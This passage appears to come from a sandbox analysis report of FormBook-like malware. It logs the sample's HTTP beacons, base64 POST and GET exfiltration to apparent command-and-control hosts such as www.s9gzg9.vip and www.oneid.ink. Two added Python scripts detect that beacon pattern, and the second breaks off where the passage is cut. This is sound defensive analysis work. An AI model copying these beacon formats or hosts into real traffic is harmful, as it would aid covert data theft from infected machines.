                                                                                Origin: http://www.s9gzg9.vip
                                                                                Referer: http://www.s9gzg9.vip/5hlj/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 55 6a 72 68 48 61 51 42 54 33 31 37 55 35 67 31 44 56 6d 33 38 2b 57 4b 6f 4b 68 58 4c 6d 4d 63 69 31 46 72 2b 42 71 6d 37 32 71 6c 41 5a 58 44 51 55 78 66 32 6f 53 56 53 6a 48 49 4d 69 36 4e 44 56 43 69 56 56 6e 78 4f 6a 5a 2f 77 77 55 53 43 71 4e 79 36 4a 5a 58 63 6a 49 48 77 52 6f 59 2f 4d 36 52 4a 5a 6e 41 52 66 33 4f 73 4b 6d 48 64 63 2b 51 64 63 4f 4d 54 35 50 4b 55 75 52 5a 73 68 59 6b 45 77 71 72 36 34 66 38 65 4c 77 44 4a 45 61 56 36 57 4b 71 65 68 57 41 35 78 6a 76 2f 55 6c 6d 42 32 31 49 31 68 72 61 6c 34 54 44 53 4c 2b 76 69 41 50 65 36 7a 73 4b 5a 36 5a 4b 4a 77 3d 3d
                                                                                Data Ascii: Y8i=UjrhHaQBT317U5g1DVm38+WKoKhXLmMci1Fr+Bqm72qlAZXDQUxf2oSVSjHIMi6NDVCiVVnxOjZ/wwUSCqNy6JZXcjIHwRoY/M6RJZnARf3OsKmHdc+QdcOMT5PKUuRZshYkEwqr64f8eLwDJEaV6WKqehWA5xjv/UlmB21I1hral4TDSL+viAPe6zsKZ6ZKJw==


                                                                                Session ID: 34 | Source IP: 192.168.2.4 | Source Port: 50042 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:38:09.183274984 CET | Bytes transferred: 774 | Direction: OUT | Data:
                                                                                POST /5hlj/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.s9gzg9.vip
                                                                                Origin: http://www.s9gzg9.vip
                                                                                Referer: http://www.s9gzg9.vip/5hlj/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 55 6a 72 68 48 61 51 42 54 33 31 37 56 59 77 31 50 57 4f 33 30 2b 57 4a 30 36 68 58 41 47 4d 59 69 31 5a 72 2b 41 66 2b 36 41 61 6c 41 34 6e 44 52 56 78 66 78 6f 53 56 56 54 48 48 43 43 36 53 44 56 48 66 56 55 62 78 4f 6a 64 2f 77 77 6b 53 46 5a 56 7a 6f 70 5a 56 54 44 49 42 74 42 6f 59 2f 4d 36 52 4a 5a 69 72 52 66 2f 4f 73 36 57 48 63 2f 6d 58 65 63 4f 50 53 35 50 4b 44 2b 52 64 73 68 59 47 45 31 4b 52 36 2b 44 38 65 4f 55 44 49 51 4f 57 7a 57 4b 57 54 42 58 77 70 77 69 62 35 6e 68 73 44 33 46 39 34 6a 33 57 70 65 43 5a 44 36 66 34 77 41 72 74 6e 30 6c 2b 55 35 6b 44 53 78 72 43 4f 56 50 58 53 48 68 30 61 73 5a 4d 32 72 66 72 56 39 4d 3d
                                                                                Data Ascii: Y8i=UjrhHaQBT317VYw1PWO30+WJ06hXAGMYi1Zr+Af+6AalA4nDRVxfxoSVVTHHCC6SDVHfVUbxOjd/wwkSFZVzopZVTDIBtBoY/M6RJZirRf/Os6WHc/mXecOPS5PKD+RdshYGE1KR6+D8eOUDIQOWzWKWTBXwpwib5nhsD3F94j3WpeCZD6f4wArtn0l+U5kDSxrCOVPXSHh0asZM2rfrV9M=


                                                                                Session ID: 35 | Source IP: 192.168.2.4 | Source Port: 50043 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:38:11.738184929 CET | Bytes transferred: 10856 | Direction: OUT | Data:
                                                                                POST /5hlj/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.s9gzg9.vip
                                                                                Origin: http://www.s9gzg9.vip
                                                                                Referer: http://www.s9gzg9.vip/5hlj/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 55 6a 72 68 48 61 51 42 54 33 31 37 56 59 77 31 50 57 4f 33 30 2b 57 4a 30 36 68 58 41 47 4d 59 69 31 5a 72 2b 41 66 2b 36 44 36 6c 42 4c 76 44 51 32 5a 66 77 6f 53 56 57 54 47 41 43 43 36 62 44 56 2f 62 56 55 58 4c 4f 68 31 2f 71 52 45 53 45 73 68 7a 69 70 5a 56 52 44 49 45 77 52 70 41 2f 4d 71 56 4a 61 4b 72 52 66 2f 4f 73 38 61 48 61 73 2b 58 53 38 4f 4d 54 35 50 38 55 75 52 31 73 6c 30 38 45 31 4f 42 39 4e 62 38 65 76 6f 44 45 47 79 57 72 47 4b 75 64 68 58 6f 70 31 36 45 35 6b 45 54 44 33 77 6d 34 68 72 57 35 66 6d 48 58 35 57 6a 6e 7a 6a 78 36 6d 46 48 64 34 63 47 53 68 44 4a 65 46 48 75 45 30 42 41 5a 66 45 38 74 6f 33 77 44 49 46 4d 73 75 41 47 52 70 66 54 46 77 4e 30 66 4d 6d 49 47 30 4b 75 68 6b 72 39 36 37 4a 35 4c 52 6f 52 75 50 48 66 66 33 46 76 57 55 64 55 31 4a 46 35 68 67 76 49 49 62 7a 54 49 59 62 4a 75 64 57 33 65 75 76 48 79 35 6e 31 37 59 51 50 52 56 2f 6f 5a 78 4a 78 48 61 6a 32 4e 63 75 44 4a 50 79 4d 58 4e 4f 50 49 6d 77 42 59 6e 73 6f 38 6d 48 52 44 6c 35 76 75 79 [TRUNCATED]
                                                                                Data Ascii: Y8i= [TRUNCATED]
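The sessions above repeat one fixed exchange per C2 host: three POSTs to a short random path with a single form field of base64 (Content-Length 200, 220 and 10300, Origin/Referer pointing back at the same path), then a GET carrying the same field plus a second parameter in the query string, answered with a 260-byte HTML page whose only content is a JavaScript redirect to /lander. The following Python script is an added example, not part of the Joe Sandbox report: it parses raw HTTP messages and scores a host's traffic against that shape. The indicator names, BEACON_UA_SUFFIX and BEACON_POST_LENGTHS are this example's own assumptions derived from the captures (not a published FormBook specification); the sample messages are rebuilt from sessions 29 and 32 above, and the benign request is constructed for contrast.

```python
"""Parser and scorer for the FormBook-style HTTP beacon shape seen in the capture.

Added example, not part of the Joe Sandbox report. Indicator names and the two
constants below are assumptions taken from the captured sessions.
"""
from __future__ import annotations

import re
from urllib.parse import urlparse

# Every request in the capture carries this User-Agent suffix.
BEACON_UA_SUFFIX = "FXM/0.2"
# Content-Length values of the three POSTs sent to each C2 host in the capture.
BEACON_POST_LENGTHS = {200, 220, 10300}
# Server reply seen after each GET: a JavaScript redirect to /lander.
LANDER_RE = re.compile(r'window\.location\.href="(/lander\?[^"]*)"')


def parse_http_message(raw: str) -> dict:
    """Split a raw HTTP/1.1 request or response into start line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    first = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if first[0].startswith("HTTP/"):
        return {"type": "response", "status": int(first[1]), "headers": headers, "body": body}
    return {"type": "request", "method": first[0], "target": first[1], "headers": headers, "body": body}


def split_form(data: str) -> dict:
    """key=value pairs WITHOUT plus/percent decoding: the beacon's base64 keeps a literal '+'."""
    out = {}
    for pair in filter(None, data.split("&")):
        key, _, value = pair.partition("=")  # split on the first '=' so base64 padding stays in value
        out[key] = value
    return out


def looks_base64(value: str) -> bool:
    """Standard-alphabet base64 with optional '=' padding and a 4-aligned length."""
    return bool(re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value)) and len(value) % 4 == 0


def classify_request(req: dict) -> list[str]:
    """Indicators matched by one request; an empty list means nothing beacon-like."""
    hits = []
    h = req["headers"]
    host = h.get("host", "")
    url = urlparse(req["target"])
    if h.get("user-agent", "").endswith(BEACON_UA_SUFFIX):
        hits.append("ua-fxm")
    # Origin/Referer point back at the beacon path on the same host, as in the capture.
    if host and h.get("referer") == f"http://{host}{url.path}":
        hits.append("self-referer")
    if req["method"] == "POST":
        form = split_form(req["body"])
        if len(form) == 1 and looks_base64(next(iter(form.values()))):
            hits.append("single-b64-field")
        if int(h.get("content-length", "0")) in BEACON_POST_LENGTHS:
            hits.append("known-post-length")
    elif req["method"] == "GET":
        query = split_form(url.query)
        if len(query) == 2 and any(looks_base64(v) for v in query.values()):
            hits.append("get-b64-query")
    return hits


def classify_response(resp: dict) -> list[str]:
    """Flag the 200 OK HTML page whose only content is a JS redirect to /lander."""
    if resp["status"] == 200 and LANDER_RE.search(resp["body"]):
        return ["js-lander-redirect"]
    return []


def score_session(raw_messages: list[str]) -> tuple[bool, list[str]]:
    """Verdict for one host: the UA marker plus at least one body/query indicator."""
    hits: set[str] = set()
    for raw in raw_messages:
        msg = parse_http_message(raw)
        hits |= set(classify_request(msg) if msg["type"] == "request" else classify_response(msg))
    verdict = "ua-fxm" in hits and bool(hits & {"single-b64-field", "get-b64-query"})
    return verdict, sorted(hits)


def build_request(method: str, host: str, target: str, ua: str, body: str = "") -> str:
    """Raw request in the shape of the captures; Content-Length is computed, not copied."""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}", f"User-Agent: {ua}", "Connection: close"]
    if method == "POST":
        lines += [f"Origin: http://{host}", f"Referer: http://{host}{urlparse(target).path}",
                  "Content-Type: application/x-www-form-urlencoded", f"Content-Length: {len(body)}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body


# Sample messages rebuilt from sessions 29 and 32 (first POST body, the GET and its reply).
UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 " + BEACON_UA_SUFFIX)
HOST = "www.funddata-x.net"
POST_BODY = ("Y8i=z8RVxp9ax2A/dyhqGUwsinWbzFgxHIcMXIRv9wWEp+hIncRK/GBpE93m4CCedpJA3KYj6FsWU18jLGpQ"
             "G4TbOZ/jPwHgNMflaaMt9Tu9sdVc3glWKIc4RHFyh+Ih/6t9Of0etDl80mHVyLeQQZe15TMYeDN/t0hR"
             "eAv6gk95jEVzVGnr4mehdef1Nb5dj+/LGA==")
GET_TARGET = ("/kgqw/?Y8i=++51ydVD2Go1KxhaP3MVo0+h3G0aMK8VVopxxXyVivx076J57lFiLJq/o16RBKp5kNk8000"
              "HSHMzLW5tY9vsaI/mDiKsTd/UPoZk72+lh+5I9xFVF6w9VAA=&gvyXe=EtxTw6OpYVppMB")
LANDER_BODY = ('<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href='
               '"/lander?Y8i=++51ydVD2Go1KxhaP3MVo0+h3G0aMK8VVopxxXyVivx076J57lFiLJq/o16RBKp5kNk8000'
               'HSHMzLW5tY9vsaI/mDiKsTd/UPoZk72+lh+5I9xFVF6w9VAA=&gvyXe=EtxTw6OpYVppMB"}</script></head></html>')
BEACON_SESSION = [
    build_request("POST", HOST, "/kgqw/", UA, POST_BODY),
    build_request("GET", HOST, GET_TARGET, UA),
    "HTTP/1.1 200 OK\r\nServer: openresty\r\nContent-Type: text/html\r\n"
    f"Content-Length: {len(LANDER_BODY)}\r\nConnection: close\r\n\r\n" + LANDER_BODY,
]
# Constructed benign request for contrast (not from the capture).
BENIGN_SESSION = [build_request("GET", "www.example.com", "/index.html?page=1&lang=en", "Mozilla/5.0")]

if __name__ == "__main__":
    for name, session in (("beacon", BEACON_SESSION), ("benign", BENIGN_SESSION)):
        print(name, *score_session(session))
```

The verdict deliberately requires the User-Agent marker plus a body or query indicator: the self-referencing Referer and the 260-byte /lander redirect are corroborating signals on their own but also occur on legitimate sites, so they raise the score without deciding it. When replaying real captures, feed one host's requests and responses together so the POST/GET pairing is visible to score_session.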


                                                                                Session ID: 36 | Source IP: 192.168.2.4 | Source Port: 50044 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:38:14.281449080 CET | Bytes transferred: 499 | Direction: OUT | Data:
                                                                                GET /5hlj/?gvyXe=EtxTw6OpYVppMB&Y8i=ZhDBEtFYcGNGcrgAAGaz4cmus4dxP105ym1b2z3b9xiYRPvGfE1I1cavQEWdGxySW1feFGHJVCpL7BE/D8kUvY9bRjJzxQ8BntPjPcySUs7sgICsU/uMV8Q= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.s9gzg9.vip
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                 Nov 17, 2024 08:38:14.909862041 CET | 400 | IN | HTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Sun, 17 Nov 2024 07:38:14 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 260
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 76 79 58 65 3d 45 74 78 54 77 36 4f 70 59 56 70 70 4d 42 26 59 38 69 3d 5a 68 44 42 45 74 46 59 63 47 4e 47 63 72 67 41 41 47 61 7a 34 63 6d 75 73 34 64 78 50 31 30 35 79 6d 31 62 32 7a 33 62 39 78 69 59 52 50 76 47 66 45 31 49 31 63 61 76 51 45 57 64 47 78 79 53 57 31 66 65 46 47 48 4a 56 43 70 4c 37 42 45 2f 44 38 6b 55 76 59 39 62 52 6a 4a 7a 78 51 38 42 6e 74 50 6a 50 63 79 53 55 73 37 73 67 49 43 73 55 2f 75 4d 56 38 51 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gvyXe=EtxTw6OpYVppMB&Y8i=ZhDBEtFYcGNGcrgAAGaz4cmus4dxP105ym1b2z3b9xiYRPvGfE1I1cavQEWdGxySW1feFGHJVCpL7BE/D8kUvY9bRjJzxQ8BntPjPcySUs7sgICsU/uMV8Q="}</script></head></html>


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 37 | 192.168.2.4 | 50045 | 172.217.18.19 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Nov 17, 2024 08:38:19.984545946 CET | 751 | OUT | POST /wlyv/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.oneid.ink
                                                                                Origin: http://www.oneid.ink
                                                                                Referer: http://www.oneid.ink/wlyv/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 46 73 35 6b 71 35 4b 45 4f 44 4a 50 4d 68 6d 61 4b 75 69 37 48 57 72 35 77 54 75 38 63 50 2b 76 55 32 6b 2b 42 68 38 66 4e 58 7a 78 42 58 36 33 4b 73 35 51 62 36 4d 34 78 5a 78 42 46 48 4c 7a 5a 49 54 42 4c 48 6b 30 41 46 4a 67 56 70 4f 41 62 38 76 30 4e 7a 70 2b 2b 67 74 34 46 57 39 79 34 4b 37 33 41 33 54 70 39 73 37 31 45 67 46 7a 59 44 39 72 67 74 77 75 4a 4d 45 38 59 72 6f 65 38 64 47 5a 36 4e 62 4a 44 6f 65 37 34 38 6a 59 36 53 43 61 5a 71 75 49 76 73 31 58 79 47 68 52 54 52 6b 4c 74 36 6f 72 45 2b 76 36 58 49 7a 30 2b 6d 4a 47 64 54 38 69 55 34 4d 73 77 56 71 53 54 41 3d 3d
                                                                                Data Ascii: Y8i=Fs5kq5KEODJPMhmaKui7HWr5wTu8cP+vU2k+Bh8fNXzxBX63Ks5Qb6M4xZxBFHLzZITBLHk0AFJgVpOAb8v0Nzp++gt4FW9y4K73A3Tp9s71EgFzYD9rgtwuJME8Yroe8dGZ6NbJDoe748jY6SCaZquIvs1XyGhRTRkLt6orE+v6XIz0+mJGdT8iU4MswVqSTA==
                                                                                 Nov 17, 2024 08:38:21.128840923 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Date: Sun, 17 Nov 2024 07:38:20 GMT
                                                                                Expires: Sun, 17 Nov 2024 07:48:20 GMT
                                                                                Cache-Control: public, max-age=600
                                                                                ETag: "MuPk2Q"
                                                                                X-Cloud-Trace-Context: cfed3c6c73063ad54a3f06fe750ce9a8
                                                                                Content-Type: text/html
                                                                                Content-Encoding: gzip
                                                                                Transfer-Encoding: chunked
                                                                                Server: Google Frontend
                                                                                Connection: close
                                                                                Data Raw: 62 65 65 0d 0a 1f 8b 08 00 00 00 00 00 02 ff ac 98 7f 6f e3 c6 11 86 bf 0a 4f 87 a0 67 e0 44 ed 0f 2e 97 94 2d a7 a8 d3 36 2d 2e 69 90 14 2d 92 20 08 68 69 25 31 27 91 02 49 59 76 2e f7 dd fb cc 52 76 7c 87 04 ed 1f 3d 9f 4d 0d b9 3b 33 3b f3 ce 3b 23 5e bd 58 b5 cb e1 e1 10 92 ed b0 df 5d 5f c9 df 64 57 35 9b c5 24 34 13 e4 50 ad ae af f6 61 a8 92 e5 b6 ea fa 30 2c 26 c7 61 3d 2d 26 b3 eb ab 5d dd bc 4d ba b0 5b 4c ea 65 db 4c 92 6d 17 d6 8b c9 ac 6d 42 bd 4a 0f cd 46 d6 c4 ad 4d b5 0f 8b c9 5d 1d 4e 87 b6 1b 26 09 ab 87 d0 a0 ea 54 af 86 ed 62 15 ee ea 65 98 46 e1 75 dd d4 43 5d ed a6 fd b2 da 85 85 fe 48 c7 b0 0d fb 30 5d b6 bb b6 7b a6 e6 a5 8a ff 3e 5a bb 0a fd b2 ab 0f 43 2d be 3d 99 fc 26 34 ab 64 8f 8f 0f c9 d0 26 df 74 75 f2 a6 6a de 56 c9 b1 af 9b 4d 72 d3 85 55 3d cc 92 cf c2 6d 3d 24 cb aa 5b 25 75 d3 0f 55 33 7c 78 e0 ea 70 d8 85 e9 d0 1e 97 db e9 ef 1f fe d7 00 ed ab a6 5e 87 9e b3 9f 83 f4 78 23 fd a9 c7 3d 02 35 d4 c3 2e 5c ff a3 09 5f 87 7d 3d 5c cd 46 f9 79 fc e2 9d 67 27 79 5c fb [TRUNCATED]
                                                                                Data Ascii: beeoOgD.-6-.i- hi%1'IYv.Rv|=M;3;;#^X]_dW5$4Pa0,&a=-&]M[LeLmmBJFM]N&TbeFuC]H0]{>ZC-=&4d&tujVMrU=m=$[%uU3|xp^x#=5.\_}=\Fyg'y\tCB7<,&f_WIN0]ewd;~>NtjtgOj_o?FmW,%lyunU=c}Uu OujO7~^G5&!\u|%b/35KN4WuZ-KHLgw,-\)w&cI.Q2mzjstmIJ!4.$ob$^6^O{(:Y0q".](v7ro94Bm7'@q7>9w}x>y7tUn?$J_wu;VsjunwZ\'AO&WUDErom.!5)ux}$'W>t'F{fU;.}<{>V<<\w]2y'.[m{Cz!jU/zh^>
                                                                                 Nov 17, 2024 08:38:21.128887892 CET | 1236 | IN | Data Raw: f7 d5 8d c4 9c 2c b5 cd a7 dc fd e7 96 a3 70 65 e3 0b 90 2c c1 59 4c ce d9 3b b4 d1 e1 cb 6d a8 37 db 61 9e 15 87 fb cb 48 ef f3 ea 38 b4 97 87 6a b5 82 6d e7 fe 70 9f 3c fb bd 7c 42 c3 ba be 0f ab 17 f5 5e da 05 dc 7b 19 09 7f fe 72 bd 5e 5f de
                                                                                Data Ascii: ,pe,YL;m7aH8jmp<|B^{r^_i?.jWuU._/9Xit%WfZa.&p?/=3~[-n3_8\gq+6+Z~e*tZ~ qv0FrQv^6!'64@
                                                                                 Nov 17, 2024 08:38:21.128973007 CET | 424 | IN | Data Raw: 43 39 82 39 92 4a 26 f0 11 59 49 53 c1 2b d1 46 15 c2 f5 c2 dc ec 8e 8f 01 48 ac 3a ab a5 c1 45 6f b0 96 93 54 00 24 eb 8a 92 f5 90 8a 16 ce 20 a6 9c 5d f4 40 be 98 43 ce 04 d5 98 f1 60 03 59 79 47 ec c9 45 0e 6a d9 9f c3 ee 92 d3 d1 1d e8 98 86
                                                                                Data Ascii: C99J&YIS+FH:EoT$ ]@C`YyGEj)q_~$)P,aA/<[&}V:\EN="b:9err#@G*}^I)EJ&b2tbBZ(::UIt:9.vn/~P9EV(~xZJ>z DL^DzL!l]y
                                                                                 Nov 17, 2024 08:38:21.129053116 CET | 491 | IN | Data Raw: 1e bc 51 17 70 d6 79 1d 01 11 5a a6 1e d0 43 4f 84 43 08 9d 0c 2f d8 a1 f8 99 46 e0 30 e2 c6 85 11 0e 75 94 1d 21 88 cd 2b 8e 0f a8 b3 52 4e 05 65 e8 20 07 e6 88 88 3f 8a 9d c1 33 0e 6a 99 90 05 bd 76 b4 4a a4 88 18 81 c9 4a 3a af 54 25 11 26 e4
                                                                                Data Ascii: QpyZCOC/F0u!+RNe ?3jvJJ:T%&qZLxg=:PggRB=D6"8`.$7{I8t(CeR<K"F_NzFD2'^i&Q29$hWBf,mDjFh2n<(u0RIbU=r
                                                                                 Nov 17, 2024 08:38:21.129084110 CET | 20 | IN | Data Raw: 61 0d 0a 03 00 3d 50 2f 84 04 16 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: a=P/0
                                                                                 Nov 17, 2024 08:38:21.129113913 CET | 20 | IN | Data Raw: 61 0d 0a 03 00 3d 50 2f 84 04 16 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: a=P/0
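
Added example (not part of the Joe Sandbox report or of the sample): a small Python triage script for the sessions above. It re-parses the session 36 GET and the session 37 POST as they appear in the capture, scores each request against indicators read off this capture only (the Chrome/44.0.2403.157 User-Agent with the trailing FXM/0.2 token, a short /xxxx/ path carrying short field names with base64-looking values, Origin and Referer pointing back at the request's own host and path), reports the field name Y8i that the GET query and the POST body share, and decodes the session 36 Data Raw bytes to confirm that www.s9gzg9.vip only echoed the request's query string into a JavaScript redirect. The two-indicator threshold, the www.example.com control request and every function name are assumptions of this example. The 200 responses from www.oneid.ink in sessions 37 to 40 carry an ordinary web page (the OneRemit site), which says nothing about whether the POSTed data was received; the request side is what carries the signal.

```python
"""Triage of the HTTP sessions captured above. Added example, not part of the
Joe Sandbox report or of the sample. Every heuristic is read off this capture:
the Chrome/44.0.2403.157 User-Agent with a trailing "FXM/0.2" token, requests
to a short /xxxx/ path whose fields are short keys with base64-looking values,
the key Y8i reused across GET query and POST body, and Origin/Referer pointing
back at the request's own host and path. The two-indicator threshold and the
www.example.com control request are assumptions."""
import binascii
import re
from urllib.parse import urlsplit

UA_TAIL_RE = re.compile(r"Chrome/44\.0\.2403\.157 Safari/537\.36 (?P<tail>\S+/\S+)$")
SHORT_PATH_RE = re.compile(r"^/[A-Za-z0-9]{3,6}/$")
SHORT_KEY_RE = re.compile(r"^[A-Za-z0-9]{2,6}$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
REDIRECT_RE = re.compile(r'window\.location\.href="([^"]+)"')
FXM_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
          "Chrome/44.0.2403.157 Safari/537.36 FXM/0.2")

# Requests of sessions 36 and 37 (headers the heuristics ignore are dropped),
# followed by a constructed benign request that serves as a control.
CAPTURED = [
    "GET /5hlj/?gvyXe=EtxTw6OpYVppMB&Y8i=ZhDBEtFYcGNGcrgAAGaz4cmus4dxP105ym1b2z3b9xiYRPvGfE1I1cav"
    "QEWdGxySW1feFGHJVCpL7BE/D8kUvY9bRjJzxQ8BntPjPcySUs7sgICsU/uMV8Q= HTTP/1.1\r\n"
    f"Host: www.s9gzg9.vip\r\nConnection: close\r\nUser-Agent: {FXM_UA}\r\n\r\n",
    "POST /wlyv/ HTTP/1.1\r\nHost: www.oneid.ink\r\nOrigin: http://www.oneid.ink\r\n"
    "Referer: http://www.oneid.ink/wlyv/\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: 200\r\nUser-Agent: {FXM_UA}\r\n\r\n"
    "Y8i=Fs5kq5KEODJPMhmaKui7HWr5wTu8cP+vU2k+Bh8fNXzxBX63Ks5Qb6M4xZxBFHLzZITBLHk0AFJgVpOAb8v0Nzp++"
    "gt4FW9y4K73A3Tp9s71EgFzYD9rgtwuJME8Yroe8dGZ6NbJDoe748jY6SCaZquIvs1XyGhRTRkLt6orE+v6XIz0+mJGdT8iU4MswVqSTA==",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/120.0\r\n\r\n",
]

# Body of the session 36 response, copied from the report's Data Raw line.
SESSION36_DATA_RAW = (
    "3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f "
    "77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 "
    "3d 22 2f 6c 61 6e 64 65 72 3f 67 76 79 58 65 3d 45 74 78 54 77 36 4f 70 59 56 70 70 4d 42 26 59 38 69 3d 5a 68 44 42 45 "
    "74 46 59 63 47 4e 47 63 72 67 41 41 47 61 7a 34 63 6d 75 73 34 64 78 50 31 30 35 79 6d 31 62 32 7a 33 62 39 78 69 59 52 "
    "50 76 47 66 45 31 49 31 63 61 76 51 45 57 64 47 78 79 53 57 31 66 65 46 47 48 4a 56 43 70 4c 37 42 45 2f 44 38 6b 55 76 "
    "59 39 62 52 6a 4a 7a 78 51 38 42 6e 74 50 6a 50 63 79 53 55 73 37 73 67 49 43 73 55 2f 75 4d 56 38 51 3d 22 7d 3c 2f 73 "
    "63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e"
)

def parse_request(raw: str) -> dict:
    """Split a raw request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}

def fields(req: dict) -> dict:
    """Key/value pairs of the query string (GET) or the form body (POST). Split by
    hand: urllib's parse_qsl would turn the '+' inside base64 values into spaces."""
    raw = urlsplit(req["target"]).query if req["method"] == "GET" else req["body"]
    return dict(pair.partition("=")[::2] for pair in raw.split("&") if pair)

def indicators(raw: str) -> list:
    """Capture-derived indicators that fire on one request."""
    req, hits = parse_request(raw), []
    path, headers = urlsplit(req["target"]).path, req["headers"]
    tail = UA_TAIL_RE.search(headers.get("user-agent", ""))
    if tail:
        hits.append("ua-tail:" + tail["tail"])
    kv = fields(req)
    if kv and SHORT_PATH_RE.match(path) and all(
            SHORT_KEY_RE.match(k) and B64_RE.match(v) for k, v in kv.items()):
        hits.append("short-path-b64-fields:" + ",".join(sorted(kv)))
    host = headers.get("host")
    if host and headers.get("origin") == f"http://{host}" \
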